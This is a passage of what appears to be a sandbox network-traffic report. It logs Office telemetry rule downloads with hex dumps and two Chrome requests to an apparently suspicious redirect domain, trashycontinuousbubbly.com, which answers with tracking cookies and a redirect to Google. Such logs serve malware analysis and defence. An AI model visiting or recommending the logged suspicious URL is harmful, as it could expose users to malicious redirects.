74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:17 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:17 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:17 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063317Z-16547b76f7fmbrhqhC1DFWkds800000007vg000000004u53 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:17 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:18 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:18 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:18 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 36c217ee-101e-008e-63b5-2fcf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063318Z-15869dbbcc6rmhmhhC1DFWd7b800000008bg000000004ax6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:18 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:18 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:18 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:18 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063318Z-16547b76f7fcrtpchC1DFW52e800000007wg000000001m4p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:18 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:18 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:18 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:18 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: a6459842-d01e-0014-395c-2eed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063318Z-15869dbbcc6b2ncxhC1DFW2ztg000000019g00000000b7cz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:18 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49840	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:18 UTC	714	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 06:33:18 UTC	971	IN	HTTP/1.1 302 Found Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:18 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Location: https://www.google.com/ Set-Cookie: u_pl23778734=1; expires=Fri, 08 Nov 2024 06:33:18 GMT; path=/ Set-Cookie: backurled=dfdceae1749487fe3ee94c1a351e9103; expires=Thu, 07 Nov 2024 06:34:18 GMT; path=/ Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 15b764b78e4a3d003decca96bb396673 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:18 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:18 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:18 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: 9eee1406-f01e-0020-6e5f-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063318Z-15869dbbcc6qwghvhC1DFWssds00000004700000000096w3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:18 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:18 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:19 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 8c12cf7c-001e-008d-5dde-30d91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063318Z-15869dbbcc6qwghvhC1DFWssds000000047g000000007mpn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-07 06:33:19 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 4bf7326f-801e-00ac-6855-2efd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063319Z-15869dbbcc6pfq2ghC1DFWmp140000000130000000000xhg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:19 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:19 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063319Z-16547b76f7fnlcwwhC1DFWz6gw00000007yg0000000020mt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:19 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 46dd0ec2-d01e-008e-5058-2e387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063319Z-17df447cdb5lrwcchC1DFWphes000000041g000000005sxy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:19 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49851	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	714	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 06:33:19 UTC	971	IN	HTTP/1.1 302 Found Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Location: https://www.google.com/ Set-Cookie: u_pl23778734=1; expires=Fri, 08 Nov 2024 06:33:19 GMT; path=/ Set-Cookie: backurled=dfdceae1749487fe3ee94c1a351e9103; expires=Thu, 07 Nov 2024 06:34:19 GMT; path=/ Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 75cbe5c6784ee920471e1528508532f1 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49852	142.250.185.132	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	657	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 06:33:19 UTC	1764	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-tdZ-13pFVY-thG2dByP_cA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model 